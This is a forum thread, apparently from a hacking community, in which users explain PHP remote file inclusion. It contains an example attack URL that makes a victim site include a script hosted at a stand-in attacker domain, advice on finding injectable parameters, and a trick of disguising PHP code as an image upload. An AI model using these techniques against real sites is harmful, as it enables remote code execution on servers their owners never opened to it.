Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

PHP Injection


ghost's Avatar
0 0

Hey, i was just searching google for some info about php injection, all i found is that you can set the variable and inject ur code where the variable is included in php code. but my question is how can you find this exploit ?? i mean u can't see the variable name so you can't test if it's vuln. that would be great if you could give me more info/article/link or anything about php injection. thanks, GreyFox


ghost's Avatar
0 0

PHP injection is basicly forcing a PHP script to execute remote code.

One of the easiest forms of PHP injection im aware of is to have a website run a script from your site using there navigation tags.

Example: lets say www.victim.com has a page like www.victim.com/index.php?id=index.php

just from the url we can tell that there executing the file "index.php".

we can easily tamper with this by uploading a script at a remote location and then running it using the same concept. i.e.: www.victim.com/index.php?id=http://www.hacker.com/evil.php

I'll get you some links to get the exact information soon. :)


ghost's Avatar
0 0

There's a few ways to know such variables.

  1. Use the source luke! Most sites use existing projects that have the entire source code readily available.

  2. Failing that, standard examination of html/js source is always useful. Link harvesting should yield numerous var=type for you to play with.

  3. Logical guessing of common dirs, files, vars. Examples are /admin, admin.php and ?action=delete.

Not too hard to get going using those ideas. =)

HTH


ghost's Avatar
0 0

That's pretty cool.

I wrote [http://www.rohitab.com/discuss/lofiversion/index.php/t9626.html]. Loving it.


ghost's Avatar
0 0

well thanks, those are good info about this. but most of the targets i found which seemed to be vuln, were not vuln. in fact they were just using "<iframe>" tag to show the page. i have a question about one thing though. why you set the type of your script file like "jpg" ?? does it even matter?? (my guess is not but i just wanted to make sure :D) thanx, GreyFox


ghost's Avatar
0 0

In essence, PHP reads the file as text. Setting it to .gif or .jpeg allows you to upload it to some forum's avatar bin, like the example of Rohitab's forums before they moved to Invision. (Some scripts actually validate the file to be an image before uploading.) Despite it's extension, PHP's include() and require() functions still read the file as text.